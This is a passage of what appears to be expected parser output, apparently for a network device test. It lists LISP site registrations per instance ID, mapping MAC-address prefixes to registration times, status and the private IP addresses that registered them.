"inst_id": 8188,
},
"a4b2.39ff.4801/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8188,
},
"a4b2.39ff.4805/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"a4b2.39ff.4908/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.490c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8188,
},
"a4b2.39ff.4910/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4914/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4918/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.491c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4924/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"a4b2.39ff.4928/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.492c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.4930/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4934/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.4938/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.493c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8188,
},
"a4b2.39ff.4940/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"a4b2.39ff.4944/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4948/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.494c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.4954/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4958/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.495c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.4960/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"a4b2.39ff.4968/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.496c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4970/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.4974/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.4978/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.497c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"a4b2.39ff.4984/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"a4b2.39ff.4988/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4994/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4998/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.49b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.49d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.49ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.49f0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.49f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4901/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4a08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.4a10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4a20/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4a28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4a2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8188,
},
"a4b2.39ff.4a30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4a34/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4a54/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4a5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4a74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.4a78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4a7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.4a80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"a4b2.39ff.4a84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4a88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4a90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4a94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4a98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8188,
},
"a4b2.39ff.4a9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4aa8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4aac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4ab0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.4ab4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8188,
},
"a4b2.39ff.4abc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4ac0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8188,
},
"a4b2.39ff.4acc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4ad0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4ad4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4ad8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8188,
},
"a4b2.39ff.4adc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4af4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4afc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"a4b2.39ff.4a05/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b0c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4b18/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4b1c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4b20/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4b28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4b2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4b30/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.4b3c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8188,
},
"a4b2.39ff.4b44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4b50/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.4b58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.4b5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"a4b2.39ff.4b60/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
"a4b2.39ff.4b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.4b78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8188,
},
"a4b2.39ff.4b7c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b80/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4b84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8188,
},
"a4b2.39ff.4b98/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4b9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8188,
},
"a4b2.39ff.4bac/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4bb0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8188,
},
"a4b2.39ff.4bb4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8188,
},
"a4b2.39ff.4bc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8188,
},
"a4b2.39ff.4bd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8188,
},
"a4b2.39ff.4bdc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.5238/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"a4b2.39ff.52b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.52d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.52ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8188,
},
"a4b2.39ff.52f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.5318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.532c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8188,
},
"a4b2.39ff.5370/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8188,
},
"a4b2.39ff.5384/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8188,
},
"a4b2.39ff.56d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8188,
},
"a4b2.39ff.56e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8188,
},
"a4b2.39ff.574c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"a4b2.39ff.57a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8188,
},
}
},
},
8189: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8189,
},
"0000.0cff.94fb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8189,
},
"0000.0cff.94fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8189,
},
"0001.2eff.ac9b/48": {
"last_register": "1d10h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8189,
},
"000c.29ff.90c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"0016.25ff.5de1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.62be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.63de/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.68ef/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.680a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.6e2c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8189,
},
"0016.25ff.6e44/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8189,
},
"0016.25ff.6e45/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8189,
},
"0016.25ff.6e58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8189,
},
"0016.25ff.6e59/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8189,
},
"0016.25ff.6e64/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8189,
},
"0016.25ff.6e75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"0016.25ff.6e85/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8189,
},
"0016.25ff.6fea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8189,
},
"0016.25ff.742e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"0016.25ff.743f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8189,
},
"0016.25ff.b93e/48": {
"last_register": "00:01:42",
"up": "yes#",
"who_last_registered": "10.8.128.146:48858",
"inst_id": 8189,
},
"001f.29ff.b6df/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8189,
},
"0022.64ff.df2d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8189,
},
"0024.81ff.32ba/48": {
"last_register": "14:54:26",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"0025.64ff.fa82/48": {
"last_register": "19:19:47",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"0025.64ff.4716/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"00cc.fcff.a6f3/48": {
"last_register": "00:00:53",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"00e0.4cff.8bd7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8189,
},
"00e0.b4ff.da01/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8189,
},
"14da.e9ff.f734/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8189,
},
"1860.24ff.d2bd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8189,
},
"1c87.2cff.44b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"1cc1.deff.5a00/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"30f7.0dff.66c0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"3417.ebff.27a8/48": {
"last_register": "19:20:04",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"3c07.54ff.315b/48": {
"last_register": "01:58:40",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"3c07.54ff.e75e/48": {
"last_register": "19:19:01",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"3c28.6dff.65ea/48": {
"last_register": "00:00:08",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8189,
},
"402c.f4ff.6577/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"4061.86ff.8e6d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"482a.e3ff.6c27/48": {
"last_register": "4d23h",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8189,
},
"4860.5fff.95ad/48": {
"last_register": "01:07:34",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"4ccc.6aff.622a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"58cb.52ff.f545/48": {
"last_register": "00:49:52",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"683b.78ff.c7ed/48": {
"last_register": "03:04:27",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8189,
},
"685b.35ff.b659/48": {
"last_register": "00:17:30",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8189,
},
"6c0b.84ff.2cca/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8189,
},
"6c0b.84ff.2fe6/48": {
"last_register": "04:14:31",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"6c0b.84ff.b83c/48": {
"last_register": "10:48:19",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"6c71.0dff.4a07/48": {
"last_register": "03:43:47",
"up": "yes#",
"who_last_registered": "10.8.129.124:39959",
"inst_id": 8189,
},
"7020.84ff.7860/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8189,
},
"7020.84ff.78fe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8189,
},
"7020.84ff.f237/48": {
"last_register": "23:55:52",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"7020.84ff.018f/48": {
"last_register": "21:55:20",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"705a.0fff.ac28/48": {
"last_register": "00:01:48",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"7085.c2ff.e523/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8189,
},
"70f3.95ff.81c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"70f3.95ff.2be2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8189,
},
"70f3.95ff.f3e1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"7824.afff.be8a/48": {
"last_register": "00:07:17",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8189,
},
"78e7.d1ff.f128/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8189,
},
"8c8e.f2ff.cbb7/48": {
"last_register": "01:27:47",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8189,
},
"8e5d.1fff.b08a/48": {
"last_register": "00:02:56",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8189,
},
"9818.88ff.67e3/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8189,
},
"9818.88ff.67e6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8189,
},
"9818.88ff.67ec/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8189,
},
"a0cc.2bff.f634/48": {
"last_register": "00:00:08",
"up": "yes#",
"who_last_registered": "10.8.129.119:51728",
"inst_id": 8189,
},
"a4ae.11ff.6b3c/48": {
"last_register": "19:15:07",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8189,
},
"a4ae.11ff.6b3d/48": {
"last_register": "19:15:07",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8189,
},
"a4c3.f0ff.2571/48": {
"last_register": "01:25:41",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8189,
},
"a81e.84ff.54e0/48": {
"last_register": "02:44:44",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8189,
},
"a860.b6ff.448a/48": {
"last_register": "19:20:03",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"b827.ebff.2c06/48": {
"last_register": "00:00:46",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"b827.ebff.2fe0/48": {
"last_register": "00:00:57",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"b827.ebff.8759/48": {
"last_register": "00:10:33",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8189,
},
"bc16.65ff.66a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8189,
},
"c8cb.b8ff.c63d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8189,
},
"d004.01ff.67f9/48": {
"last_register": "00:04:09",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8189,
},
"d485.64ff.529e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"dc4a.3eff.5d38/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"dca6.32ff.5e2c/48": {
"last_register": "00:03:08",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"dca6.32ff.fc60/48": {
"last_register": "00:01:59",
"up": "yes#",
"who_last_registered": "10.8.128.153:11837",
"inst_id": 8189,
},
"dca6.32ff.2868/48": {
"last_register": "19:30:09",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8189,
},
"e04f.43ff.6443/48": {
"last_register": "00:16:34",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8189,
},
"e069.95ff.9fd8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8189,
},
"e0cb.4eff.466d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8189,
},
"e4e7.49ff.87df/48": {
"last_register": "00:29:31",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
"e86a.64ff.4277/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8189,
},
"f493.9fff.ddd3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8189,
},
"f493.9fff.dddc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8189,
},
"fc4d.d4ff.9bcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8189,
},
"fc4d.d4ff.103c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8189,
},
}
},
},
8190: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
